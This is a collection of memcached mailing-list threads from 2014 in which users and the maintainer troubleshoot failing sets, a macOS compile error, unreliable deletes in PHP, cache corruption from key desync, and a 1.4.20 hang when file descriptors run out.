You may also consider an upgrade sometime... If the conn tester doesn't pull up much, I don't know what it'd be beyond things like spaces/newlines/invalid chars sneaking in, or items being too large. that sort of thing. Cache::Memcached's error reporting is pretty terrible. I have a long list of bugs/pull reqs against it that I haven't been reviewing/merging, if any of you folks are interested in helping there. On Mon, 1 Dec 2014, Joe Steffee wrote: listen_disabled_num doesn't seem to be a likely culprit... stats STAT pid 11435 STAT uptime 4457974 STAT time 1417457018 STAT version 1.4.5 STAT pointer_size 64 STAT rusage_user 19038.393825 STAT rusage_system 42581.905202 STAT curr_connections 264 STAT total_connections 1572308 STAT connection_structures 402 STAT cmd_get 658366591 STAT cmd_set 649621925 STAT cmd_flush 0 STAT get_hits 328785935 STAT get_misses 329580656 STAT delete_misses 20884653 STAT delete_hits 100083 STAT incr_misses 2779284 STAT incr_hits 44211787 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 12821501027510 STAT bytes_written 3338632258667 STAT limit_maxbytes 4294967296 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT threads 4 STAT conn_yields 441 STAT bytes 2786601635 STAT curr_items 5046673 STAT total_items 48200778 STAT evictions 0 STAT reclaimed 30123302 END The web servers are very lightly loaded and have approximately 20GB free memory all the time. The utility showed nothing: # time ./mc_conn_tester.pl Averages: (conn: 0.00045183) (set: 0.00047043) (get: 0.00031982) real 53m25.697s user 0m17.721s sys 0m11.093s Even though we saw 14 failures during this time period. Will look more to see if this is a problem on our end On Sat, Nov 29, 2014 at 4:46 PM, dormando dorma...@rydia.net wrote: Hey, http://memcached.org/timeouts - sounds like you've already done some tcp dumping, so checking the stats as mentioned in here and running the test script a bit should illuminate things a bit. On Fri, 21 Nov 2014, kgo...@bepress.com wrote: A couple months ago, we moved our memcached nodes from a dedicated VM to having one each on our four baremetal web servers (mod_perl). Since we moved, we've been seeing 10-20 failures per hour across our entire environment, where $c-set returns false. I just spend some time with tcpdump and wireshark watching the memcached traffic over port 11211. The keys that are failing are *not* in the tcpdump, so I'm thinking Cache::Memcached has lost a connection or got a non-functioning socket somehow? Does anything in this scenario give anybody any ideas of what might be going wrong? Each memcached node has about 250 connections at any given time and is handling up to 350 gets/sets per second. The load on these webservers is around 1 (eight-core boxes). Their total network traffic is about 30 Mb/sec, and memcached traffic is about 3 Mb/sec. There's nothing in memcached's logs. This is debian 6 (squeeze). $ dpkg -l | grep memcached ii libcache-memcached-perl 1.29-1 Perl module for using memcached servers ii memcached 1.4.5-1+deb6u1 A high-performance memory object caching system -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. 
-- Joe Steffee, Linux Systems Administrator, bepress
Re: Compile fails on Mavericks (Xcode 5 really)
Please use a newer source tarball from http://memcached.org/ - this was fixed ages ago. On Sat, 29 Nov 2014, vivek verma wrote: Hi, Can you please specify how to manually remove pthread? I don't have certain rights in the system, so can't follow other solutions. Thanks On Wednesday, October 23, 2013 8:18:35 PM UTC+5:30, Matt Galvin wrote: Hello, On both Mac OS X 10.8 and the new 10.9 with Xcode 5 memcached fails to compile. Is this a know issue already? Is there a fix in the works already? ./configure --enable-64bit --with-libevent=/usr/local --- gcc -v Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-include-dir=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/include/c++/4.2.1 Apple LLVM version 5.0 (clang-500.2.79) (based on LLVM 3.3svn) Target: x86_64-apple-darwin13.0.0 Thread model: posix --- gcc -DHAVE_CONFIG_H -I. -DNDEBUG -I/usr/local/include -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -MT memcached-cache.o -MD -MP -MF .deps/memcached-cache.Tpo -c -o memcached-cache.o `test -f 'cache.c' || echo './'`cache.c mv -f .deps/memcached-cache.Tpo .deps/memcached-cache.Po gcc -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -L/usr/local/lib -Wl,-rpath,/usr/local/lib -o memcached memcached-memcached.o memcached-hash.o memcached-slabs.o memcached-items.o memcached-assoc.o memcached-thread.o memcached-daemon.o memcached-stats.o memcached-util.o memcached-cache.o -levent clang: error: argument unused during compilation: '-pthread' clang: error: argument unused during compilation: '-pthread' make[2]: *** [memcached] Error 1 make[1]: *** [all-recursive] Error 1 make: *** [all] Error 2 --- If I manually remove the -pthread(s) it compiles fine but I'm not sure if that is the correct fix as I've not done any development on memcached as of yet. Thoughts? Thanks, Matt -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: sets failing, nothing going over the network
Hey, http://memcached.org/timeouts - sounds like you've already done some tcp dumping, so checking the stats mentioned there and running the test script a bit should illuminate things. On Fri, 21 Nov 2014, kgo...@bepress.com wrote: A couple months ago, we moved our memcached nodes from a dedicated VM to having one each on our four baremetal web servers (mod_perl). Since we moved, we've been seeing 10-20 failures per hour across our entire environment, where $c->set returns false. I just spent some time with tcpdump and Wireshark watching the memcached traffic over port 11211. The keys that are failing are *not* in the tcpdump, so I'm thinking Cache::Memcached has lost a connection or got a non-functioning socket somehow? Does anything in this scenario give anybody any ideas of what might be going wrong? Each memcached node has about 250 connections at any given time and is handling up to 350 gets/sets per second. The load on these webservers is around 1 (eight-core boxes). Their total network traffic is about 30 Mb/sec, and memcached traffic is about 3 Mb/sec. There's nothing in memcached's logs. This is Debian 6 (squeeze).
$ dpkg -l | grep memcached
ii libcache-memcached-perl 1.29-1 Perl module for using memcached servers
ii memcached 1.4.5-1+deb6u1 A high-performance memory object caching system
Re: memcached 1.4.13: -remove() sometimes doesn't work
Are your sets or any other functions failing sometimes? Are you just more likely to notice with a delete? The only issues have always been with the client. Old clients would send invalid args to the delete command (though it doesn't seem like you're doing that here). You might just be failing to connect sometimes; double check http://memcached.org/timeouts for ideas or things to try. On Wed, 26 Nov 2014, Alexander Kant wrote: Hello. Currently I'm using memcached 1.4.13. Sometimes the ->remove() method doesn't work; it looks like the value stays there. I can't say exactly when it fails, but several hundred times in a row it works as expected: the value is cached and can be removed without problems, so the code looks fine at that point. But after several hundred successful calls, it fails to remove the value. The question is: is/was this a known problem? Does anybody have some ideas? I'm using the Zend Framework. Here is the important part of the PHP code:
public static function getCache() {
    if (!self::$cache) {
        $options = array(
            'servers' => array(
                array(
                    'host' => Config::get('cache.memcached.host'),
                    'port' => Config::get('cache.memcached.port'),
                    'persistent' => true,
                    'weight' => 1,
                    'timeout' => 5,
                    'retry_interval' => 15,
                    'status' => true,
                    'default_lifetime' => 3600
                ),
            ),
        );
        self::$cache = Zend_Cache::factory('Core', 'Memcached',
            array('caching' => true, 'automatic_serialization' => true, 'lifetime' => null),
            $options);
    }
    return self::$cache;
}

public function getCountCached($user_id) {
    $cache = System::getCache();
    $cache_id = 'count_values__' . $user_id;
    if ($cache->test($cache_id)) {
        $data = $cache->load($cache_id);
    } else {
        $data = $this->countValues($user_id);
        $cache->save($data, $cache_id, array(), Time::hours(2));
    }
    return (int)$data;
}

public function invalidateCountCache($user_id) {
    $success = false;
    for ($i = 0; $i < 5; $i++) {
        if (!$success) {
            $success = System::getCache()->remove('count_values__' . $user_id);
        } else {
            return;
        }
    }
}
As I read somewhere before: the ->remove() method also often returns FALSE even when the removal was successful. I hope somebody has some ideas. With best regards, Alex
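(A quick way to take the client stack out of the picture when this recurs is to issue the delete by hand over the text protocol against the same host:port, e.g. with telnet or nc; the key below is just an example built the same way the code above builds its cache ids:

delete count_values__12345

The server replies DELETED, or NOT_FOUND if the key is already gone. If raw-protocol deletes work reliably while the Zend/PHP wrapper still reports FALSE, the problem is in the client layer rather than in memcached.)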
Re: Diagnosing Corruption
You're probably getting spaces or newlines into your keys, which can cause the client protocol to desync with the server. Then you'll get all sorts of junk into random keys (or random responses from keys which're fine). Either filtering those or using the binary protocol should fix that for you. On Wed, 19 Nov 2014, labnext...@gmail.com wrote: Hi Boris, I think I may have mislead you. It is not one or two keys that get corrupted, it seems that most (if not all) keys fetched return incorrect data. For example during one of these failures (just this morning), a session key (prefixed with session_) returned an array related to a customer record (prefixed with lab_), a key related to a customer return a string related to a translation, and a key related to a translation returned All heck breaks loose (seemingly) across all keys. A flush brings things back into the fold. Make sense? Thanks, Mike On Wednesday, November 19, 2014 2:22:50 PM UTC-4, Boris wrote: I can think of many ways to screw up an application in a way that you describe. Simple programmer error can lead to this sort of behavior. I'd just log every time you do a set for that key with value type you are setting. On Wed, Nov 19, 2014 at 1:00 PM, labne...@gmail.com wrote: Thanks Boris, I haven't really given that much thought. Out of curiosity, why do you think the issue might be on the client end? I ask, cause I really don't have a sense of what to look for on that end and wonder if you might have some suggestions. Best, Mike On Wednesday, November 19, 2014 12:46:16 PM UTC-4, Boris wrote: Hi Mike, this sounds to me more like a client/coding error rather than memcached server. That's where I would focus first. Boris On Wed, Nov 19, 2014 at 11:41 AM, labne...@gmail.com wrote: I just had another failure. After pulling down my apache web servers, and before restarting memcached I grabbed stats to see if they showed anything of interest: - All 3 servers were reporting for duty following a getServerStatus (PHP client call) - curr_connections were listed as 8 across all the instances (apache was down but cron jobs up, so that would have dropped things down considerably) - listen_disabled_num was listed as 0 across all the instances - accepting_conns was listed as 1 across all the instances - evictions listed as 0 - All items across all instances had an evicted and evicted_nonzero and evicted_time value of 0 - All slabs across all instances had a total_pages value of 1 - tailrepairs and outofmemory is listed with a value of 0 across all items in each instance - global hit rate is 0.9937 - get_hits is always* greater than cmd_set on a per slab basis. *One slab reported both values as equal As far as I can tell, memcache is reporting that the world is fine and dandy. Should I be enlarging scope of the search to look at OS related factors that could result in the client receiving bad data? None of the machines are dipping into swap. Thanks, Mike On Wednesday, November 19, 2014 9:35:19 AM UTC-4, labne...@gmail.com wrote: For what it is worth, I'm hesitant to upgrade memcached to the latest version as a step to try and solve this issue. It seems to me that since our installs have been running without issue for quite some time (close to a year), that there are other variables at play here. I just don't understand the variables. ;) Thanks, Mike On Tuesday, November 18, 2014 2:00:46 PM UTC-4, labne...@gmail.com wrote: Hi There, I'm trying to diagnose a new problem with Memcache that seems to be happening with greater frequency. 
The issue has to do with memcache get requests returning incorrect responses (data from from other keys returned). Restarting or flushing the servers seems to resolve the issue. Do any memcache veterans have any suggestions of how I might dig into this issue? Stats that I might want to trace, log files to look at, etc? Does maybe this symptom fit the description of any known issues? I'm keeping a casual eye on on curr_connections, listen_disabled_num, accepting_conns, bytes, and limit_maxbytes (all show nothing unusual). I've verified that all servers and clients are set up in a consistent fashion. I'm not sure where to go from here to better understand the problem. If it helps, I'm running 1.4.13 (ubuntu 12.04 LTS) across 3 servers, connecting in with PHP Memcache 3.0.6 Tips? Mike -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this
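(To make the desync described at the top of this thread concrete: a text-protocol set is "set <key> <flags> <exptime> <bytes>" followed by exactly <bytes> bytes of data. If a key picks up an embedded space, e.g. the client intends to store a 5-byte value under the key "user 42" and sends

set user 42 0 3600 5
hello

the server takes "user" as the key, 42 as the flags, 0 as the exptime and 3600 as the value length, so it keeps consuming the following 3600 bytes of the stream, including later commands, as value data. From then on replies no longer line up with requests, which looks exactly like most keys returning someone else's data. The binary protocol length-prefixes keys and values, which is why it avoids this failure mode.)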
Re: memcached-1.4.20 stuck when Too many open connections
There're too many things that will go wrong if malloc fails... There's a stats counter covering some of them. Is that going up for you? Have you disabled overcommit memory? Have you observed the process size when it hangs? malloc should almost never actually fail under normal conditions... On Wed, 5 Nov 2014, Samdy Sun wrote: Hey, I also got a hang when specifying -m 200. As mentioned previously, could that case happen as below? 1. malloc fails in conn_new(); 2. event_add fails in conn_new(); 3. some other case? And I found another case after reviewing the code. Here it is: memcached is stuck for a while, during which our clients close their connections because of a 200ms timeout. So, if the previous 1023 connections have timed out and memcached calls transmit to write, a Broken pipe error will happen. Memcached then gets a TRANSMIT_HARD_ERROR and calls conn_close immediately. So it could happen as below?
accept(), errno == EMFILE
fd1 close, fd2 close, fd3 close, ... fd1023 close,
accept_new_conns(false) for EMFILE
That is just a supposition, but I will try to log some information to prove it. Anyway, would it be better to delay conn_close for a while, such as until the next event, after getting a TRANSMIT_HARD_ERROR, rather than calling conn_close immediately? On Friday, October 31, 2014 at 3:01:06 PM UTC+8, Dormando wrote: Hey, How are you reproducing this? How many connections do you typically have open? It's really bizarre that your curr_conns is 5, but your connections are disabled? Even if there's still a race, as more connections close they each have an opportunity to flip the acceptor back on. Can you print what stats settings shows? If it's adjusting your actual maxconns downward it should show there... On Wed, 29 Oct 2014, Samdy Sun wrote: There are no deadlocks,
(gdb) info thread
* 5 Thread 0xf7771b70 (LWP 24962) 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044
4 Thread 0xf6d70b70 (LWP 24963) 0x007ad430 in __kernel_vsyscall ()
3 Thread 0xf636fb70 (LWP 24964) 0x007ad430 in __kernel_vsyscall ()
2 Thread 0xf596eb70 (LWP 24965) 0x007ad430 in __kernel_vsyscall ()
1 Thread 0xf77b38d0 (LWP 24961) 0x007ad430 in __kernel_vsyscall ()
(gdb) t 1
[Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0 0x007ad430 in __kernel_vsyscall ()
(gdb) bt
#0 0x007ad430 in __kernel_vsyscall ()
#1 0x005c5366 in epoll_wait () from /lib/libc.so.6
#2 0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, tv=0xff8e0cdc) at epoll.c:198
#3 0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538
#4 0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
(gdb) t 2
[Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0 0x007ad430 in __kernel_vsyscall ()
(gdb) bt
#0 0x007ad430 in __kernel_vsyscall ()
#1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2 0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
#3 0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4 0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 3
[Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0 0x007ad430 in __kernel_vsyscall ()
(gdb) bt
#0 0x007ad430 in __kernel_vsyscall ()
#1 0x005838b6 in nanosleep () from /lib/libc.so.6
#2 0x005836e0 in sleep () from /lib/libc.so.6
#3 0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
#4 0x00a61a49 in start_thread () from /lib/libpthread.so.0
#5 0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 4
[Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0 0x007ad430 in __kernel_vsyscall ()
(gdb) bt
#0 0x007ad430 in __kernel_vsyscall ()
#1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2 0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
#3 0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4 0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 5
[Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0 0x007ad430 in __kernel_vsyscall ()
(gdb) bt
#0 0x007ad430 in __kernel_vsyscall ()
#1 0x00a68998 in sendmsg () from /lib/libpthread.so.0
#2 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044
#3 drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370
#4 event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441
#5 0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at event.c:395
#6 event_base_loop (base=0x9310658, flags=0) at event.c:547
#7 0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471
#8 0x00a61a49 in start_thread () from /lib/libpthread.so.0
#9 0x005c4aee in clone () from /lib/libc.so.6
(gdb)
From the strace info, the only event registered on epoll seems to be the maxconns event?
Re: memcached-1.4.20 stuck when Too many open connections
Hey, How are you reproducing this? How many connections do you typically have open? It's really bizarre that your curr_conns is 5, but your connections are disabled? Even if there's still a race, as more connections close they each have an opportunity to flip the acceptor back on. Can you print what stats settings shows? If it's adjusting your actual maxconns downward it should show there... On Wed, 29 Oct 2014, Samdy Sun wrote: There are no deadlocks, (gdb) info thread * 5 Thread 0xf7771b70 (LWP 24962) 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 4 Thread 0xf6d70b70 (LWP 24963) 0x007ad430 in __kernel_vsyscall () 3 Thread 0xf636fb70 (LWP 24964) 0x007ad430 in __kernel_vsyscall () 2 Thread 0xf596eb70 (LWP 24965) 0x007ad430 in __kernel_vsyscall () 1 Thread 0xf77b38d0 (LWP 24961) 0x007ad430 in __kernel_vsyscall () (gdb) t 1 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005c5366 in epoll_wait () from /lib/libc.so.6 #2 0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, tv=0xff8e0cdc) at epoll.c:198 #3 0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538 #4 0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795 (gdb) (gdb) t 2 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 3 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005838b6 in nanosleep () from /lib/libc.so.6 #2 0x005836e0 in sleep () from /lib/libc.so.6 #3 0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819 #4 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #5 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 4 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 5 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a68998 in sendmsg () from /lib/libpthread.so.0 #2 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 #3 drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370 #4 event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441 #5 0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at event.c:395 #6 event_base_loop (base=0x9310658, flags=0) at event.c:547 #7 0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471 #8 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #9 0x005c4aee in clone () from /lib/libc.so.6 (gdb) strace info, there is the only event named maxconnsevent on epoll? 
epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 10084037}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 20246365}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 30382098}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 40509766}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 50657403}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 60823841}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 71013006}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 81234264}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 91407508}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 101581187}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 111752457}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 121919049}) = 0 epoll_wait(4, {}, 32, 10) = 0 clock_gettime(CLOCK_MONOTONIC, {8374269, 132057597}) = 0 On Wednesday, October 29, 2014 at 2:47:23 PM UTC+8, Samdy Sun wrote: Hello, I got a memcached-1.4.20 stuck problem when EMFILE happens. Here is my memcached's cmdline: memcached -s /xxx/mc_usock.11201 -c 1024 -m 4000 -f
Re: memcached-1.4.20 stuck when Too many open connections
Hey, 32-bit memcached with -m 4000 will never work. the best you can do is probably -m 1600. 32bit applications typically can only allocate up to 2G of ram. memcached isn't protected from a lot of malloc failure scenarios, so what you're doing will never work. -m 4000 only limits the slab memory usage. there're a lot of buffers/etc outside of that. Also the hash table, which is measured separately. On Fri, 31 Oct 2014, Samdy Sun wrote: @Dormando, I try my best to reproduce this in my environment, but failed. This just happened on my servers. I use stats command to check the memcached if it is available or not. If the memcached is unavailable, we will not send request to it. This is what I feel strange when my curr_conns is 5 and memcached can't recover itself. I think conn_new call maybe fail, and it call close(fd) directly, not conn_close()? Such as below? 1. malloc fails when conn_new() 2. event_add fails when conn_new() 3. other case? Take notice of that I build memcached on 32-bit system and it runs on 64-bit system. Additionally, I use -m 4000 for memcached's start. Thanks, Samdy Sun 在 2014年10月31日星期五UTC+8下午3时01分06秒,Dormando写道: Hey, How are you reproducing this? How many connections do you typically have open? It's really bizarre that your curr_conns is 5, but your connections are disabled? Even if there's still a race, as more connections close they each have an opportunity to flip the acceptor back on. Can you print what stats settings shows? If it's adjusting your actual maxconns downward it should show there... On Wed, 29 Oct 2014, Samdy Sun wrote: There are no deadlocks, (gdb) info thread * 5 Thread 0xf7771b70 (LWP 24962) 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 4 Thread 0xf6d70b70 (LWP 24963) 0x007ad430 in __kernel_vsyscall () 3 Thread 0xf636fb70 (LWP 24964) 0x007ad430 in __kernel_vsyscall () 2 Thread 0xf596eb70 (LWP 24965) 0x007ad430 in __kernel_vsyscall () 1 Thread 0xf77b38d0 (LWP 24961) 0x007ad430 in __kernel_vsyscall () (gdb) t 1 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005c5366 in epoll_wait () from /lib/libc.so.6 #2 0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, tv=0xff8e0cdc) at epoll.c:198 #3 0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538 #4 0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795 (gdb) (gdb) t 2 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859 #3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 3 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x005838b6 in nanosleep () from /lib/libc.so.6 #2 0x005836e0 in sleep () from /lib/libc.so.6 #3 0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819 #4 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #5 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 4 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0 #2 0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251 
#3 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #4 0x005c4aee in clone () from /lib/libc.so.6 (gdb) t 5 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0 0x007ad430 in __kernel_vsyscall () (gdb) bt #0 0x007ad430 in __kernel_vsyscall () #1 0x00a68998 in sendmsg () from /lib/libpthread.so.0 #2 0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4044 #3 drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370 #4 event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441 #5 0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at event.c:395 #6 event_base_loop (base=0x9310658, flags=0) at event.c:547 #7 0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471 #8 0x00a61a49 in start_thread () from /lib/libpthread.so.0 #9
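To make the 2GB point above concrete, here is a tiny standalone demo (my own illustration, not anything from the memcached source): built 32-bit (gcc -m32 demo.c), malloc typically stops succeeding somewhere around 2-3GB of total allocations no matter how much RAM the 64-bit host has, which is why -m 4000 plus all the connection buffers and the hash table can never fit in a 32-bit build.

    #include <stdio.h>
    #include <stdlib.h>

    int main(void) {
        const size_t chunk = 64 * 1024 * 1024;   /* 64MB per allocation */
        unsigned long long total = 0;
        /* Leak on purpose; we only care where malloc starts returning NULL.
           The 16GB cap just keeps the demo from running away on a 64-bit build. */
        while (total < 16ULL * 1024 * 1024 * 1024 && malloc(chunk) != NULL) {
            total += chunk;
        }
        printf("malloc stopped succeeding after ~%llu MB\n", total / (1024 * 1024));
        return 0;
    }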
Re: memcached-1.4.20 stuck when Too many open connections
You're absolutely sure the running version was 1.4.20? that looks like a bug that was fixed in .19 or .20 hmmm... maybe a unix domain bug? On Tue, 28 Oct 2014, Samdy Sun wrote: Hello, I got a memcached-1.4.20 stuck problem when EMFILE happens. Here is my memcached's cmdline: memcached -s /xxx/mc_usock.11201 -c 1024 -m 4000 -f 1.05 -o slab_automove -o slab_reassign -t 1 -p 11201. cat /proc/version Linux version 2.6.32-358.el6.x86_64 (mockbu...@x86-022.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jan 29 11:47:41 EST 2013 memcached-1.4.20 gets stuck and doesn't work any more after it runs for a period of time. Here is some information from gdb: (gdb) p stats $2 = {mutex = {__data = {__lock = 0, __count = 0, __owner = 0, __kind = 0, __nusers = 0, {__spins = 0, __list = {__next = 0x0}}}, __size = '\000' <repeats 23 times>, __align = 0}, curr_items = 149156, total_items = 9876811, curr_bytes = 3712501870, curr_conns = 5, total_conns = 39738, rejected_conns = 0, malloc_fails = 0, reserved_fds = 5, conn_structs = 1012, get_cmds = 0, set_cmds = 0, touch_cmds = 0, get_hits = 0, get_misses = 0, touch_hits = 0, touch_misses = 0, evictions = 0, reclaimed = 0, started = 0, accepting_conns = false, listen_disabled_num = 1, hash_power_level = 17, hash_bytes = 524288, hash_is_expanding = false, expired_unfetched = 0, evicted_unfetched = 0, slab_reassign_running = false, slabs_moved = 20, lru_crawler_running = false, disable_write_by_exptime = 0, disable_write_by_length = 0, disable_write_by_access = 0, evicted_write_reply_timeout_times = 0} (gdb) p allow_new_conns $4 = false And I found that allow_new_conns is only set to false when accept fails and errno is EMFILE. Here is the code: static void drive_machine(conn *c) { ... } else if (errno == EMFILE) { if (settings.verbose > 0) fprintf(stderr, "Too many open connections\n"); accept_new_conns(false); stop = true; } else { ... } If I change the flag allow_new_conns, it can work again. As below: (gdb) set allow_new_conns=1 (gdb) p allow_new_conns $5 = true (gdb) c Continuing. I know that allow_new_conns will be set to true when conn_close is called. But how could this happen in the case where accept failed with errno EMFILE and this connection is the only one accepting? Note that curr_conns = 5. It has not run out of fds: ls /proc/1748(memcached_pid)/fd | wc -l 17
Re: Is memcached server response guaranteed to be in order?
